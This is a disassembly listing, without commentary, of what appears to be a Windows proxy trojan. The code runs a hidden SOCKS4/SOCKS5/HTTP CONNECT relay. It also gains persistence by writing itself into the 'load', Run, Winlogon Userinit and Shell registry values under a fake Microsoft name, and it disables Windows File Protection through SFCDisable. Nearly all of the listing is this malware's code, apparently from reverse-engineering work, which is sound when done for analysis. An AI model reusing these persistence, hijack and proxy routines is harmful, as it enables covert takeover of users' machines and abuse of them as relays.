var_D72 = byte ptr -0D72h
var_D71 = byte ptr -0D71h
var_D70 = byte ptr -0D70h
var_D6F = byte ptr -0D6Fh
var_D6E = byte ptr -0D6Eh
var_D6D = byte ptr -0D6Dh
var_D6C = byte ptr -0D6Ch
var_D6B = byte ptr -0D6Bh
var_1B8 = byte ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = byte ptr -1ACh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40A1B8
push offset sub_403FB8
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 2194h
call sub_403E90
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_4], ebx
lea eax, [ebp+var_1AC]
push eax
push 202h
call sub_403458 ; WSAStartup
push ebx
call sub_4039D6
pop ecx
mov esi, eax
call dword_40A0C8 ; GetCurrentProcessId
imul esi, eax
push esi
call sub_403E68
push 3Ch
push ebx
mov esi, offset dword_40F280
push esi
call sub_403AC0
push 0BB8h
push ebx
push offset dword_40E6C0
call sub_403AC0
add esp, 1Ch
loc_40197B: ; CODE XREF: sub_4018FD+A6�j
call sub_403E72
cdq
mov ecx, 0FBFDh
idiv ecx
add edx, 401h
mov word_40E684, dx
movzx eax, dx
push eax
push esi
call sub_401118
pop ecx
pop ecx
test eax, eax
jnz short loc_40197B
lea eax, [ebp+var_1B8]
push eax
push ebx
push ebx
push offset sub_401586
push ebx
push ebx
call dword_40A0C4 ; CreateThread
loc_4019BB: ; CODE XREF: sub_4018FD+22E�j
mov [ebp+var_F84], ebx
mov [ebp+var_E80], ebx
mov eax, dword_40F288
mov [ebp+var_F80], eax
mov [ebp+var_F84], 1
mov [ebp+var_1B4], eax
mov [ebp+var_1B0], ebx
loc_4019E8: ; CODE XREF: sub_4018FD+15B�j
cmp [ebp+var_1B0], 32h
jnb short loc_401A5A
mov eax, [ebp+var_1B0]
imul eax, 3Ch
mov ecx, dword_40E6C8[eax]
cmp ecx, ebx
jle short loc_401A52
cmp [ebp+var_F84], 40h
jnb short loc_401A20
mov edx, [ebp+var_F84]
mov [ebp+edx*4+var_F80], ecx
inc [ebp+var_F84]
loc_401A20: ; CODE XREF: sub_4018FD+10E�j
cmp dword_40E6DC[eax], ebx
jz short loc_401A44
cmp [ebp+var_E80], 40h
jnb short loc_401A44
mov eax, [ebp+var_E80]
mov [ebp+eax*4+var_E7C], ecx
inc [ebp+var_E80]
loc_401A44: ; CODE XREF: sub_4018FD+129�j
; sub_4018FD+132�j
cmp ecx, [ebp+var_1B4]
jbe short loc_401A52
mov [ebp+var_1B4], ecx
loc_401A52: ; CODE XREF: sub_4018FD+105�j
; sub_4018FD+14D�j
inc [ebp+var_1B0]
jmp short loc_4019E8
; ---------------------------------------------------------------------------
loc_401A5A: ; CODE XREF: sub_4018FD+F2�j
push 8
push ebx
lea eax, [ebp+var_D7C]
push eax
call sub_403AC0
add esp, 0Ch
mov [ebp+var_D7C], 2
mov [ebp+var_D78], ebx
lea eax, [ebp+var_D7C]
push eax
push ebx
lea eax, [ebp+var_E80]
push eax
lea eax, [ebp+var_F84]
push eax
mov eax, [ebp+var_1B4]
inc eax
push eax
call sub_40340A ; select
push 0BB9h
push ebx
lea eax, [ebp+var_D74]
push eax
call sub_403AC0
add esp, 0Ch
lea eax, [ebp+var_F84]
push eax
push dword_40F288
call sub_403404 ; __WSAFDIsSet
test eax, eax
jz short loc_401B1C
mov [ebp+var_1B0], ebx
loc_401AD0: ; CODE XREF: sub_4018FD+21D�j
cmp [ebp+var_1B0], 32h
jnb short loc_401B1C
mov esi, [ebp+var_1B0]
imul esi, 3Ch
cmp dword_40E6C8[esi], ebx
jnz short loc_401B14
lea edi, dword_40E6C0[esi]
push edi
push offset dword_40F280
call sub_4011A5
pop ecx
pop ecx
test eax, eax
jnz short loc_401B1C
push ebx
call sub_4039D6
pop ecx
mov dword_40E6D8[esi], eax
mov dword ptr [edi], 1
loc_401B14: ; CODE XREF: sub_4018FD+1EB�j
inc [ebp+var_1B0]
jmp short loc_401AD0
; ---------------------------------------------------------------------------
loc_401B1C: ; CODE XREF: sub_4018FD+1CB�j
; sub_4018FD+1DA�j ...
mov [ebp+var_1B0], ebx
loc_401B22: ; CODE XREF: sub_4018FD+BE9�j
mov esi, [ebp+var_1B0]
cmp esi, 32h
jnb loc_4019BB
imul esi, 3Ch
cmp dword_40E6C8[esi], ebx
jz loc_4024E0
mov [ebp+var_1088], ebx
push ebx
call sub_4039D6
pop ecx
sub eax, dword_40E6D8[esi]
cmp eax, 1Eh
jb short loc_401B7B
lea edi, dword_40E6C0[esi]
cmp dword ptr [edi], 3
jz short loc_401B7B
mov eax, dword_40E6F8[esi]
cmp eax, ebx
jz short loc_401B74
push eax
call sub_40140A
pop ecx
loc_401B74: ; CODE XREF: sub_4018FD+26E�j
push edi
call sub_40140A
pop ecx
loc_401B7B: ; CODE XREF: sub_4018FD+259�j
; sub_4018FD+264�j
push ebx
call sub_4039D6
pop ecx
sub eax, dword_40E6D8[esi]
cmp eax, 78h
jb short loc_401BAB
mov eax, dword_40E6F8[esi]
cmp eax, ebx
jz short loc_401B9E
push eax
call sub_40140A
pop ecx
loc_401B9E: ; CODE XREF: sub_4018FD+298�j
lea eax, dword_40E6C0[esi]
push eax
call sub_40140A
pop ecx
loc_401BAB: ; CODE XREF: sub_4018FD+28E�j
cmp dword_40E6DC[esi], ebx
jz short loc_401BDE
lea eax, [ebp+var_E80]
push eax
push dword_40E6C8[esi]
call sub_403404 ; __WSAFDIsSet
test eax, eax
jz short loc_401BDE
push ebx
push offset dword_40E3F4
lea eax, dword_40E6C0[esi]
push eax
call sub_401210
add esp, 0Ch
loc_401BDE: ; CODE XREF: sub_4018FD+2B4�j
; sub_4018FD+2CA�j
lea edi, dword_40E6C0[esi]
cmp dword ptr [edi], 1
jnz loc_40220E
lea eax, [ebp+var_F84]
push eax
push dword_40E6C8[esi]
call sub_403404 ; __WSAFDIsSet
test eax, eax
jz loc_40220E
push 0BB8h
lea eax, [ebp+var_D74]
push eax
push edi
call sub_4013B6
add esp, 0Ch
test eax, eax
jnz loc_40224A
cmp [ebp+var_D74], 47h
jz short loc_401C3A
cmp [ebp+var_D74], 50h
jnz loc_401E41
loc_401C3A: ; CODE XREF: sub_4018FD+32E�j
mov [ebp+var_219C], ebx
mov [ebp+var_1194], ebx
lea esi, [ebp+var_D74]
loc_401C4C: ; CODE XREF: sub_4018FD+360�j
mov [ebp+var_108C], esi
mov al, [esi]
cmp al, bl
jz short loc_401C5F
cmp al, 20h
jz short loc_401C5F
inc esi
jmp short loc_401C4C
; ---------------------------------------------------------------------------
loc_401C5F: ; CODE XREF: sub_4018FD+359�j
; sub_4018FD+35D�j
cmp byte ptr [esi], 20h
jz short loc_401C78
loc_401C64: ; CODE XREF: sub_4018FD+384�j
; sub_4018FD+3C8�j ...
mov eax, [ebp+var_1B0]
imul eax, 3Ch
add eax, offset dword_40E6C0
push eax
jmp loc_40224B
; ---------------------------------------------------------------------------
loc_401C78: ; CODE XREF: sub_4018FD+365�j
inc esi
mov [ebp+var_108C], esi
cmp [esi], bl
jz short loc_401C64
push 7
push offset aHttp ; "http://"
push esi
call sub_403E30
add esp, 0Ch
test eax, eax
jnz short loc_401CA0
add esi, 7
mov [ebp+var_108C], esi
loc_401CA0: ; CODE XREF: sub_4018FD+398�j
mov [ebp+var_2198], esi
loc_401CA6: ; CODE XREF: sub_4018FD+3BE�j
mov al, [esi]
cmp al, bl
jz short loc_401CBD
cmp al, 2Fh
jz short loc_401CBD
cmp al, 20h
jz short loc_401CBD
inc esi
mov [ebp+var_108C], esi
jmp short loc_401CA6
; ---------------------------------------------------------------------------
loc_401CBD: ; CODE XREF: sub_4018FD+3AD�j
; sub_4018FD+3B1�j ...
mov al, [esi]
cmp al, 20h
jz short loc_401CC7
cmp al, 2Fh
jnz short loc_401C64
loc_401CC7: ; CODE XREF: sub_4018FD+3C4�j
mov [ebp+var_1190], esi
sub esi, [ebp+var_2198]
cmp esi, 0FFh
ja short loc_401C64
push 100h
push ebx
lea eax, [ebp+var_118C]
push eax
call sub_403AC0
push esi
push [ebp+var_2198]
lea eax, [ebp+var_118C]
push eax
call sub_403510
add esp, 18h
lea esi, [ebp+var_118C]
loc_401D09: ; CODE XREF: sub_4018FD+41D�j
mov [ebp+var_108C], esi
mov al, [esi]
cmp al, bl
jz short loc_401D1C
cmp al, 3Ah
jz short loc_401D1C
inc esi
jmp short loc_401D09
; ---------------------------------------------------------------------------
loc_401D1C: ; CODE XREF: sub_4018FD+416�j
; sub_4018FD+41A�j
cmp byte ptr [esi], 3Ah
jnz short loc_401D33
lea eax, [esi+1]
push eax
call sub_403DA0
pop ecx
mov [ebp+var_219C], eax
mov [esi], bl
loc_401D33: ; CODE XREF: sub_4018FD+422�j
cmp [ebp+var_219C], ebx
jnz short loc_401D45
mov [ebp+var_219C], 50h
loc_401D45: ; CODE XREF: sub_4018FD+43C�j
push 1000h
push ebx
lea eax, [ebp+var_2194]
push eax
call sub_403AC0
add esp, 0Ch
lea esi, [ebp+var_D74]
loc_401D60: ; CODE XREF: sub_4018FD+48A�j
mov [ebp+var_108C], esi
mov al, [esi]
cmp al, bl
jz short loc_401D89
cmp al, 20h
jz short loc_401D89
lea eax, [ebp+var_2194]
push eax
call sub_403B90
pop ecx
mov cl, [esi]
mov [ebp+eax+var_2194], cl
inc esi
jmp short loc_401D60
; ---------------------------------------------------------------------------
loc_401D89: ; CODE XREF: sub_4018FD+46D�j
; sub_4018FD+471�j
lea eax, [ebp+var_2194]
push eax
call sub_403B90
mov [ebp+eax+var_2194], 20h
push [ebp+var_1190]
lea eax, [ebp+var_2194]
push eax
call sub_403CC0
add esp, 0Ch
mov [ebp+var_1194], ebx
mov [ebp+var_1C], ebx
loc_401DBB: ; CODE XREF: sub_4018FD+606�j
cmp [ebp+var_1C], 32h
jnb short loc_401E16
mov esi, [ebp+var_1C]
imul esi, 3Ch
cmp dword_40E6C8[esi], ebx
jnz loc_401F00
lea edi, dword_40E6C0[esi]
push [ebp+var_219C]
lea eax, [ebp+var_118C]
push eax
push edi
call sub_401063
add esp, 0Ch
test eax, eax
jz loc_401EAD
mov eax, [ebp+var_1B0]
imul eax, 3Ch
add eax, offset dword_40E6C0
push eax
call sub_40140A
pop ecx
mov [ebp+var_1194], 1
loc_401E16: ; CODE XREF: sub_4018FD+4C2�j
; sub_4018FD+5FE�j
cmp [ebp+var_1194], ebx
jnz loc_401C64
mov esi, [ebp+var_1B0]
imul esi, 3Ch
lea edi, dword_40E6C0[esi]
mov dword ptr [edi], 29Ah
mov dword_40E6C4[esi], 6
loc_401E41: ; CODE XREF: sub_4018FD+337�j
cmp [ebp+var_D74], 43h
jnz loc_4020C7
mov [ebp+var_21AC], ebx
loc_401E54: ; CODE XREF: sub_4018FD+5AE�j
lea eax, [ebp+var_D74]
push eax
call sub_403B90
pop ecx
test eax, eax
jz loc_401F08
lea eax, [ebp+var_D74]
push eax
call sub_403B90
pop ecx
cmp byte ptr [ebp+eax+var_D78+3], 0Ah
jz short loc_401E97
lea eax, [ebp+var_D74]
push eax
call sub_403B90
pop ecx
cmp byte ptr [ebp+eax+var_D78+3], 0Dh
jnz short loc_401F08
loc_401E97: ; CODE XREF: sub_4018FD+581�j
lea eax, [ebp+var_D74]
push eax
call sub_403B90
pop ecx
mov byte ptr [ebp+eax+var_D78+3], bl
jmp short loc_401E54
; ---------------------------------------------------------------------------
loc_401EAD: ; CODE XREF: sub_4018FD+4F4�j
mov dword ptr [edi], 2
lea eax, [ebp+var_2194]
push eax
call sub_409472
mov dword_40E6E0[esi], eax
push ebx
call sub_4039D6
mov dword_40E6D4[esi], eax
push ebx
call sub_4039D6
add esp, 0Ch
mov dword_40E6D8[esi], eax
mov eax, [ebp+var_1B0]
imul eax, 3Ch
lea ecx, dword_40E6C0[eax]
mov dword_40E6F8[esi], ecx
mov dword_40E6F8[eax], edi
jmp loc_401E16
; ---------------------------------------------------------------------------
loc_401F00: ; CODE XREF: sub_4018FD+4D0�j
inc [ebp+var_1C]
jmp loc_401DBB
; ---------------------------------------------------------------------------
loc_401F08: ; CODE XREF: sub_4018FD+566�j
; sub_4018FD+598�j
xor esi, esi
mov [ebp+var_21A8], esi
mov [ebp+var_21A4], ebx
loc_401F16: ; CODE XREF: sub_4018FD+689�j
lea eax, [ebp+var_D74]
push eax
call sub_403B90
pop ecx
cmp esi, eax
jnb short loc_401F3B
cmp [ebp+esi+var_D74], 20h
jnz short loc_401F7F
mov [ebp+var_21A4], 1
loc_401F3B: ; CODE XREF: sub_4018FD+628�j
cmp [ebp+var_21A4], ebx
jz loc_401C64
lea edi, [ebp+esi+var_D73]
mov [ebp+var_21A0], edi
xor esi, esi
mov [ebp+var_21A8], esi
mov [ebp+var_21A4], ebx
loc_401F62: ; CODE XREF: sub_4018FD+692�j
push edi
call sub_403B90
pop ecx
cmp esi, eax
jnb short loc_401F91
cmp byte ptr [edi+esi], 20h
jnz short loc_401F88
mov [ebp+var_21A4], 1
jmp short loc_401F91
; ---------------------------------------------------------------------------
loc_401F7F: ; CODE XREF: sub_4018FD+632�j
inc esi
mov [ebp+var_21A8], esi
jmp short loc_401F16
; ---------------------------------------------------------------------------
loc_401F88: ; CODE XREF: sub_4018FD+674�j
inc esi
mov [ebp+var_21A8], esi
jmp short loc_401F62
; ---------------------------------------------------------------------------
loc_401F91: ; CODE XREF: sub_4018FD+66E�j
; sub_4018FD+680�j
cmp [ebp+var_21A4], ebx
jz loc_401C64
mov [edi+esi], bl
xor esi, esi
mov [ebp+var_21A8], esi
mov [ebp+var_21A4], ebx
loc_401FAE: ; CODE XREF: sub_4018FD+759�j
push edi
call sub_403B90
pop ecx
cmp esi, eax
jnb short loc_401FCD
cmp byte ptr [edi+esi], 3Ah
jnz loc_40204F
mov [ebp+var_21A4], 1
loc_401FCD: ; CODE XREF: sub_4018FD+6BA�j
cmp [ebp+var_21A4], ebx
jz loc_401C64
add esi, edi
lea eax, [esi+1]
push eax
call sub_403DA0
pop ecx
mov [ebp+var_21AC], eax
mov [esi], bl
mov [ebp+var_21A4], ebx
mov [ebp+var_1C], ebx
loc_401FF6: ; CODE XREF: sub_4018FD+904�j
cmp [ebp+var_1C], 32h
jnb loc_40209C
mov esi, [ebp+var_1C]
imul esi, 3Ch
cmp dword_40E6C8[esi], ebx
jnz loc_4021FE
lea eax, dword_40E6C0[esi]
movzx ecx, word ptr [ebp+var_21AC]
push ecx
push edi
push eax
call sub_401063
add esp, 0Ch
test eax, eax
jz short loc_40205B
mov eax, [ebp+var_1B0]
imul eax, 3Ch
add eax, offset dword_40E6C0
push eax
call sub_40140A
pop ecx
mov [ebp+var_21A4], 1
jmp short loc_40209C
; ---------------------------------------------------------------------------
loc_40204F: ; CODE XREF: sub_4018FD+6C0�j
inc esi
mov [ebp+var_21A8], esi
jmp loc_401FAE
; ---------------------------------------------------------------------------
loc_40205B: ; CODE XREF: sub_4018FD+72F�j
lea edi, dword_40E6C0[esi]
mov dword ptr [edi], 2
push ebx
call sub_4039D6
mov dword_40E6D4[esi], eax
push ebx
call sub_4039D6
pop ecx
pop ecx
mov dword_40E6D8[esi], eax
mov eax, [ebp+var_1B0]
imul eax, 3Ch
lea ecx, dword_40E6C0[eax]
mov dword_40E6F8[esi], ecx
mov dword_40E6F8[eax], edi
loc_40209C: ; CODE XREF: sub_4018FD+6FD�j
; sub_4018FD+750�j
cmp [ebp+var_21A4], ebx
jnz loc_401C64
mov esi, [ebp+var_1B0]
imul esi, 3Ch
lea edi, dword_40E6C0[esi]
mov dword ptr [edi], 29Ah
mov dword_40E6C4[esi], 3
loc_4020C7: ; CODE XREF: sub_4018FD+54B�j
cmp [ebp+var_D74], 5
jnz short loc_4020FF
mov [ebp+var_D74], 5
mov [ebp+var_D73], bl
push 2
lea eax, [ebp+var_D74]
push eax
push edi
call sub_401210
add esp, 0Ch
mov dword ptr [edi], 0Bh
mov dword_40E6C4[esi], 5
loc_4020FF: ; CODE XREF: sub_4018FD+7D1�j
cmp [ebp+var_D74], 4
jnz loc_4024E0
mov al, [ebp+var_D72]
mov byte ptr [ebp+var_1088+1], al
mov al, [ebp+var_D71]
mov byte ptr [ebp+var_1088], al
push 100h
push ebx
lea eax, [ebp+var_1084]
push eax
call sub_403AC0
movzx eax, [ebp+var_D6D]
push eax
movzx eax, [ebp+var_D6E]
push eax
movzx eax, [ebp+var_D6F]
push eax
movzx eax, [ebp+var_D70]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
lea eax, [ebp+var_1084]
push eax
call sub_403C5B
add esp, 24h
mov [ebp+var_1C], ebx
loc_40216D: ; CODE XREF: sub_4018FD+90C�j
cmp [ebp+var_1C], 32h
jnb short loc_4021DC
mov esi, [ebp+var_1C]
imul esi, 3Ch
cmp dword_40E6C8[esi], ebx
jnz loc_402206
lea edi, dword_40E6C0[esi]
movzx eax, word ptr [ebp+var_1088]
push eax
lea eax, [ebp+var_1084]
push eax
push edi
call sub_401063
mov dword ptr [edi], 2
push ebx
call sub_4039D6
mov dword_40E6D4[esi], eax
push ebx
call sub_4039D6
add esp, 14h
mov dword_40E6D8[esi], eax
mov eax, [ebp+var_1B0]
imul eax, 3Ch
lea ecx, dword_40E6C0[eax]
mov dword_40E6F8[esi], ecx
mov dword_40E6F8[eax], edi
loc_4021DC: ; CODE XREF: sub_4018FD+874�j
mov eax, [ebp+var_1B0]
imul eax, 3Ch
mov dword_40E6C0[eax], 29Ah
mov dword_40E6C4[eax], 4
jmp loc_4024E0
; ---------------------------------------------------------------------------
loc_4021FE: ; CODE XREF: sub_4018FD+70F�j
inc [ebp+var_1C]
jmp loc_401FF6
; ---------------------------------------------------------------------------
loc_402206: ; CODE XREF: sub_4018FD+882�j
inc [ebp+var_1C]
jmp loc_40216D
; ---------------------------------------------------------------------------
loc_40220E: ; CODE XREF: sub_4018FD+2EA�j
; sub_4018FD+304�j
cmp dword ptr [edi], 0Bh
jnz loc_402391
lea eax, [ebp+var_F84]
push eax
push dword_40E6C8[esi]
call sub_403404 ; __WSAFDIsSet
test eax, eax
jz loc_402391
push 0BB8h
lea eax, [ebp+var_D74]
push eax
push edi
call sub_4013B6
add esp, 0Ch
test eax, eax
jz short loc_402255
loc_40224A: ; CODE XREF: sub_4018FD+321�j
push edi
loc_40224B: ; CODE XREF: sub_4018FD+376�j
call sub_40140A
jmp loc_4024DF
; ---------------------------------------------------------------------------
loc_402255: ; CODE XREF: sub_4018FD+94B�j
push 100h
push ebx
lea eax, [ebp+var_1084]
push eax
call sub_403AC0
add esp, 0Ch
cmp [ebp+var_D71], 1
jnz short loc_4022BB
movzx eax, [ebp+var_D6D]
push eax
movzx eax, [ebp+var_D6E]
push eax
movzx eax, [ebp+var_D6F]
push eax
movzx eax, [ebp+var_D70]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
lea eax, [ebp+var_1084]
push eax
call sub_403C5B
add esp, 18h
mov al, [ebp+var_D6C]
mov byte ptr [ebp+var_1088+1], al
mov al, [ebp+var_D6B]
jmp short loc_4022FD
; ---------------------------------------------------------------------------
loc_4022BB: ; CODE XREF: sub_4018FD+974�j
cmp [ebp+var_D71], 3
jnz short loc_402303
movzx eax, [ebp+var_D70]
push eax
lea eax, [ebp+var_D6F]
push eax
lea eax, [ebp+var_1084]
push eax
call sub_403510
add esp, 0Ch
movzx eax, [ebp+var_D70]
mov cl, [ebp+eax+var_D6F]
mov byte ptr [ebp+var_1088+1], cl
mov al, [ebp+eax+var_D6E]
loc_4022FD: ; CODE XREF: sub_4018FD+9BC�j
mov byte ptr [ebp+var_1088], al
loc_402303: ; CODE XREF: sub_4018FD+9C5�j
mov [ebp+var_1C], ebx
loc_402306: ; CODE XREF: sub_4018FD+A8F�j
cmp [ebp+var_1C], 32h
jnb short loc_402371
mov esi, [ebp+var_1C]
imul esi, 3Ch
cmp dword_40E6C8[esi], ebx
jnz short loc_402389
lea edi, dword_40E6C0[esi]
movzx eax, word ptr [ebp+var_1088]
push eax
lea eax, [ebp+var_1084]
push eax
push edi
call sub_401063
mov dword ptr [edi], 2
push ebx
call sub_4039D6
mov dword_40E6D4[esi], eax
push ebx
call sub_4039D6
add esp, 14h
mov dword_40E6D8[esi], eax
mov eax, [ebp+var_1B0]
imul eax, 3Ch
lea ecx, dword_40E6C0[eax]
mov dword_40E6F8[esi], ecx
mov dword_40E6F8[eax], edi
loc_402371: ; CODE XREF: sub_4018FD+A0D�j
mov eax, [ebp+var_1B0]
imul eax, 3Ch
mov dword_40E6C0[eax], 29Ah
jmp loc_4024E0
; ---------------------------------------------------------------------------
loc_402389: ; CODE XREF: sub_4018FD+A1B�j
inc [ebp+var_1C]
jmp loc_402306
; ---------------------------------------------------------------------------
loc_402391: ; CODE XREF: sub_4018FD+914�j
; sub_4018FD+92E�j
cmp dword ptr [edi], 2
jnz loc_40251D
push ebx
call sub_4039D6
pop ecx
sub eax, dword_40E6D4[esi]
cmp eax, 1
jb loc_40251D
push edi
call sub_401000
mov [ebp+var_1C], eax
push ebx
call sub_4039D6
pop ecx
pop ecx
mov dword_40E6D4[esi], eax
cmp [ebp+var_1C], 2
jz loc_402490
push ebx
call sub_4039D6
pop ecx
sub eax, dword_40E6D8[esi]
cmp eax, 1Eh
jnb loc_402490
cmp [ebp+var_1C], ebx
jnz loc_4024E0
push 9
push ebx
lea eax, [ebp+var_D74]
push eax
call sub_403AC0
add esp, 0Ch
mov eax, dword_40E6F8[esi]
mov ecx, [eax+4]
cmp ecx, 4
jnz short loc_40242B
mov [ebp+var_D73], 5Ah
push 8
loc_402419: ; CODE XREF: sub_4018FD+B62�j
lea ecx, [ebp+var_D74]
push ecx
push eax
call sub_401210
add esp, 0Ch
jmp short loc_402481
; ---------------------------------------------------------------------------
loc_40242B: ; CODE XREF: sub_4018FD+B11�j
cmp ecx, 3
jnz short loc_40243F
push offset aHttp1_0200Conn ; "HTTP/1.0 200 Connection established\r\nPr"...
push eax
call sub_401318
pop ecx
pop ecx
jmp short loc_402481
; ---------------------------------------------------------------------------
loc_40243F: ; CODE XREF: sub_4018FD+B31�j
cmp ecx, 5
jnz short loc_402461
mov [ebp+var_D74], cl
mov [ebp+var_D73], bl
mov [ebp+var_D72], bl
mov [ebp+var_D71], 1
push 9
jmp short loc_402419
; ---------------------------------------------------------------------------
loc_402461: ; CODE XREF: sub_4018FD+B45�j
cmp ecx, 6
jnz short loc_402481
push dword_40E6E0[esi]
call sub_403B90
push eax
push dword_40E6E0[esi]
push edi
call sub_401210
add esp, 10h
loc_402481: ; CODE XREF: sub_4018FD+B2C�j
; sub_4018FD+B40�j ...
push 3
pop eax
mov [edi], eax
mov ecx, dword_40E6F8[esi]
mov [ecx], eax
jmp short loc_4024E0
; ---------------------------------------------------------------------------
loc_402490: ; CODE XREF: sub_4018FD+ACE�j
; sub_4018FD+AE4�j
push 9
push ebx
lea eax, [ebp+var_D74]
push eax
call sub_403AC0
add esp, 0Ch
mov eax, dword_40E6F8[esi]
mov ecx, [eax+4]
cmp ecx, 4
jnz short loc_4024BB
mov [ebp+var_D73], 5Bh
push 8
jmp short loc_40250B
; ---------------------------------------------------------------------------
loc_4024BB: ; CODE XREF: sub_4018FD+BB1�j
cmp ecx, 3
jnz short loc_4024EB
push offset aHttp1_0201Unab ; "HTTP/1.0 201 Unable to connect\r\nProxy-a"...
push eax
call sub_401318
pop ecx
pop ecx
loc_4024CD: ; CODE XREF: sub_4018FD+BF1�j
; sub_4018FD+C1E�j ...
push dword_40E6F8[esi]
call sub_40140A
push edi
call sub_40140A
pop ecx
loc_4024DF: ; CODE XREF: sub_4018FD+953�j
pop ecx
loc_4024E0: ; CODE XREF: sub_4018FD+23D�j
; sub_4018FD+809�j ...
inc [ebp+var_1B0]
jmp loc_401B22
; ---------------------------------------------------------------------------
loc_4024EB: ; CODE XREF: sub_4018FD+BC1�j
cmp ecx, 5
jnz short loc_4024CD
mov [ebp+var_D74], cl
mov [ebp+var_D73], cl
mov [ebp+var_D72], bl
mov [ebp+var_D71], 1
push 9
loc_40250B: ; CODE XREF: sub_4018FD+BBC�j
lea ecx, [ebp+var_D74]
push ecx
push eax
call sub_401210
add esp, 0Ch
jmp short loc_4024CD
; ---------------------------------------------------------------------------
loc_40251D: ; CODE XREF: sub_4018FD+A97�j
; sub_4018FD+AAD�j
mov eax, dword_40E6F8[esi]
cmp eax, ebx
jz short loc_4024E0
cmp [eax+1Ch], ebx
jnz short loc_4024E0
mov eax, [edi]
cmp eax, 3
jz short loc_40253A
cmp eax, 29Ah
jnz short loc_4024E0
loc_40253A: ; CODE XREF: sub_4018FD+C34�j
lea eax, [ebp+var_F84]
push eax
push dword_40E6C8[esi]
call sub_403404 ; __WSAFDIsSet
test eax, eax
jz short loc_4024E0
push 0BB8h
lea eax, [ebp+var_D74]
push eax
push edi
call sub_4013B6
add esp, 0Ch
test eax, eax
jnz loc_4024CD
push dword_40E6D0[esi]
lea eax, [ebp+var_D74]
push eax
push dword_40E6F8[esi]
call sub_401210
add esp, 0Ch
jmp loc_4024E0
sub_4018FD endp
; ---------------------------------------------------------------------------
push dword ptr [ebp-14h]
call sub_401635
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4025AD proc near ; CODE XREF: sub_4032B7+34�p
var_40C = byte ptr -40Ch
var_308 = byte ptr -308h
var_208 = byte ptr -208h
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 40Ch
push ebx
push esi
push edi
lea eax, [ebp+var_108]
push 104h
push eax
push 0
call dword_40A0C0 ; GetModuleFileNameA
mov edi, dword_40A008
lea eax, [ebp+var_4]
mov ebx, 20006h
push eax
push ebx
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows NT\\CurrentVe"...
push 80000001h
call edi ; RegOpenKeyExA
mov esi, dword_40A004
test eax, eax
jnz short loc_402619
lea eax, [ebp+var_108]
push eax
call sub_403B90
pop ecx
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push 0
push offset aLoad ; "load"
push [ebp+var_4]
call esi ; RegSetValueExA
loc_402619: ; CODE XREF: sub_4025AD+46�j
lea eax, [ebp+var_4]
push eax
push ebx
push 0
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call edi ; RegOpenKeyExA
test eax, eax
jnz short loc_402654
lea eax, [ebp+var_108]
push eax
call sub_403B90
pop ecx
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push 0
push offset aMicrosoftRWind ; "Microsoft (R) Windows Protocol Deployme"...
push [ebp+var_4]
call esi ; RegSetValueExA
loc_402654: ; CODE XREF: sub_4025AD+81�j
lea eax, [ebp+var_4]
push eax
push ebx
xor ebx, ebx
push ebx
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push 80000002h
call edi ; RegOpenKeyExA
test eax, eax
jnz loc_402708
lea eax, [ebp+var_40C]
push 104h
push eax
call dword_40A0CC ; GetSystemDirectoryA
lea eax, [ebp+var_108]
mov edi, 100h
push eax
lea eax, [ebp+var_40C]
push eax
push offset aSUserinit_exeS ; "%s\\userinit.exe,%s"
lea eax, [ebp+var_308]
push edi
push eax
call sub_404090
lea eax, [ebp+var_108]
push eax
push offset aExplorer_exeS ; "Explorer.exe %s"
lea eax, [ebp+var_208]
push edi
push eax
call sub_404090
lea eax, [ebp+var_308]
push eax
call sub_403B90
add esp, 28h
inc eax
push eax
lea eax, [ebp+var_308]
push eax
push 1
push ebx
push offset aUserinit ; "Userinit"
push [ebp+var_4]
call esi ; RegSetValueExA
lea eax, [ebp+var_208]
push eax
call sub_403B90
pop ecx
inc eax
push eax
lea eax, [ebp+var_208]
push eax
push 1
push ebx
push offset aShell ; "Shell"
push [ebp+var_4]
call esi ; RegSetValueExA
loc_402708: ; CODE XREF: sub_4025AD+BD�j
push [ebp+var_4]
call dword_40A000 ; RegCloseKey
pop edi
pop esi
pop ebx
leave
retn
sub_4025AD endp
; =============== S U B R O U T I N E =======================================
sub_402716 proc near ; CODE XREF: sub_402B5D+3E�p
var_8 = byte ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebx
push ebp
push esi
push edi
push 4
mov esi, dword_40A008
pop ebp
lea eax, [esp+18h+var_8]
mov ebx, 20006h
push eax
push ebx
push 0
mov edi, 80000002h
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push edi
mov [esp+2Ch+var_4], ebp
call esi ; RegOpenKeyExA
test eax, eax
jnz short loc_40275F
lea eax, [esp+18h+var_4]
push ebp
push eax
push ebp
push 0
push offset aSfcdisable ; "SFCDisable"
push dword ptr [esp+2Ch+var_8]
call dword_40A004 ; RegSetValueExA
loc_40275F: ; CODE XREF: sub_402716+2F�j
lea eax, [esp+18h+var_8]
push eax
push ebx
push 0
push offset aSoftwarePolici ; "SOFTWARE\\Policies\\Microsoft\\Windows NT\\"...
push edi
call esi ; RegOpenKeyExA
test eax, eax
jnz short loc_40278B
lea eax, [esp+18h+var_4]
push ebp
push eax
push ebp
push 0
push offset aSfcdisable ; "SFCDisable"
push dword ptr [esp+2Ch+var_8]
call dword_40A004 ; RegSetValueExA
loc_40278B: ; CODE XREF: sub_402716+5B�j
